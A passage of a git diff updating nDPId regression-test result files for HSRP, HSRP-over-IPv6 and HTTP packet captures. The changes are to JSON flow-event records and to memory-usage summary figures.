+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481220,"flow_last_seen":1643795481220,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.253.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643795481192,"flow_last_seen":1643795481192,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1643795481220,"l3_proto":"ip4","src_ip":"10.52.220.125","dst_ip":"224.0.0.102","src_port":1985,"dst_port":1985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"hsrp2.pcap","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":104,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1643795481220} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870505 bytes -~~ total memory freed........: 5870505 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6004139 bytes +~~ total memory freed........: 6004139 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 678 chars diff --git a/test/results/hsrp2_ipv6.pcapng.out b/test/results/hsrp2_ipv6.pcapng.out index 8d51790ca..937b3a6e9 100644 --- a/test/results/hsrp2_ipv6.pcapng.out +++ b/test/results/hsrp2_ipv6.pcapng.out @@ -2,16 +2,16 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1589369101819} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369101819,"flow_last_seen":1589369101819,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369101819,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1589369101819,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"thread_ts_msec":1589369101819,"pkt":"MzMAAABmqrvMAAEggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAIAgQAAAAB"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369101819,"flow_last_seen":1589369101819,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369101819,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369101819,"flow_last_seen":1589369101819,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369101819,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369104269,"flow_last_seen":1589369104269,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369104269,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1589369104269,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"thread_ts_msec":1589369104269,"pkt":"MzMAAABmqrvMAAIggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAHAgQAAAAB"} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369104269,"flow_last_seen":1589369104269,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369104269,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1589369104269,"flow_last_seen":1589369104269,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1589369104269,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1589369122912,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":138,"pkt_l4_len":80,"thread_ts_msec":1589369122912,"pkt":"MzMAAABmqrvMAAEggQAAEIbdbgAAAABQEf\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAZgftB+0AUK+YASgCAAQGABCqu8wAASAAAABpAAAnEAAATiD+gAAAAAAAAAAFc\/\/+oAAQBBwBAAAAAAAAAQAAAABR0exRqzRQmrLjMYjKT+47"} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1589369125824,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":138,"pkt_l4_len":80,"thread_ts_msec":1589369125824,"pkt":"MzMAAABmqrvMAAIggQAAEIbdbgAAAABQEf\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAZgftB+0AUAFOASgCAAQGABCqu8wAAiAAAABkAAAnEAAATiD+gAAAAAAAAAAFc\/\/+oAAQBBwBAAAAAAAAAgAAAAA6x1WuKROwiNJvQ30Zxepz"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1589369130453,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"thread_ts_msec":1589369130453,"pkt":"MzMAAABmqrvMAAEggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAB\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAIAgQAAAAB"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1589369131526,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":34525,"pkt_l3_offset":18,"pkt_l4_offset":58,"pkt_len":72,"pkt_l4_len":14,"thread_ts_msec":1589369131526,"pkt":"MzMAAABmqrvMAAIggQAAEIbdbgAAAAAOEf\/+gAAAAAAAAAAAAAAAAAAC\/wIAAAAAAAAAAAAAAAAAZgftB+0ADvAHAgQAAAAB"} -00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369104269,"flow_last_seen":1589369235852,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":900,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} -00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369101819,"flow_last_seen":1589369240383,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00805{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369104269,"flow_last_seen":1589369235852,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":900,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::2","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1589369101819,"flow_last_seen":1589369240383,"flow_idle_time":200000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1589369240383,"l3_proto":"ip6","src_ip":"fe80::1","dst_ip":"ff02::66","src_port":2029,"dst_port":2029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HSRP","breed":"Acceptable","category":"Network"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":36,"source":"hsrp2_ipv6.pcapng","alias":"nDPId-test","packets-captured":36,"packets-processed":36,"total-skipped-flows":0,"total-l4-payload-len":1998,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1589369240383} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 36/36 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871491 bytes -~~ total memory freed........: 5871491 bytes -~~ total allocations/frees...: 118152/118152 +~~ total memory allocated....: 6005125 bytes +~~ total memory freed........: 6005125 bytes +~~ total allocations/frees...: 120914/120914 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 811 chars diff --git a/test/results/http-crash-content-disposition.pcap.out b/test/results/http-crash-content-disposition.pcap.out index 4cf3ff2d0..76e09bb2d 100644 --- a/test/results/http-crash-content-disposition.pcap.out +++ b/test/results/http-crash-content-disposition.pcap.out @@ -4,8 +4,8 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492518365663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365663,"pkt":"RQAAPNS7QABABvZlwKgAZ66BAArH4wBQe0WpbgAAAACgAjkINI0AAAIEBbQEAggKABR91QAAAAABAwMG"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492518365767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1492518365767,"pkt":"RQAAPAAAQAAtBt4hroEACsCoAGcAUMfjkVcfantFqW+gEjiQ\/PYAAAIEBawEAggKK6FboQAUfdUBAwMH"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492518365789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1492518365789,"pkt":"RQAANNS8QABABvZswKgAZ66BAArH4wBQe0Wpb5FXH2uAEADlY08AAAEBCAoAFH3sK6FboQ=="} -00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492518365663,"flow_last_seen":1492518365809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1492518365809,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"khu.sh","url":"khu.sh\/imessages.php?songify_a=3h248fIbwJ&new","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} -00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492518365663,"flow_last_seen":1492518365968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2844,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1492518365968,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492518365663,"flow_last_seen":1492518365809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1492518365809,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"khu.sh","url":"khu.sh\/imessages.php?songify_a=3h248fIbwJ&new","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1492518365663,"flow_last_seen":1492518365968,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2844,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1492518365968,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"174.129.0.10","src_port":51171,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"http-crash-content-disposition.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":2844,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1492518365968} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9/9 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869812 bytes -~~ total memory freed........: 5869812 bytes -~~ total allocations/frees...: 118127/118127 +~~ total memory allocated....: 6003446 bytes +~~ total memory freed........: 6003446 bytes +~~ total allocations/frees...: 120889/120889 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 475 chars ~~ json string max len.......: 844 chars diff --git a/test/results/http-lines-split.pcap.out b/test/results/http-lines-split.pcap.out index 0b142c156..525f4e55c 100644 --- a/test/results/http-lines-split.pcap.out +++ b/test/results/http-lines-split.pcap.out @@ -4,8 +4,8 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593713340401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0t6tAAHkGyLLAqAABwKgAFJlEemkrolmxAAAAAIAC+vBZugAAAgQFtAEBBAIBAwMG"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593713340401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593713340401,"pkt":"YDjgxTWgABjzZLGICABFAAA0AABAALIGR17AqAAUwKgAAXppmUT8ca\/AK6JZsoAS+vCBjAAAAgQFtAEBBAIBAwMH"} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593713340401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1593713340401,"pkt":"ABjzZLGIYDjgxTWgCABFAAAot6xAAHkGyL3AqAABwKgAFJlEemkrolmy\/HGvwVAQA+zlTAAAAAAAAAAA"} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1593713340401,"flow_last_seen":1593713340402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1593713340402,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"toni.lan","url":"toni.lan:31337\/","code":0,"content_type":"","user_agent":""}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1593713340401,"flow_last_seen":1593713340404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1593713340404,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.20","src_port":39236,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 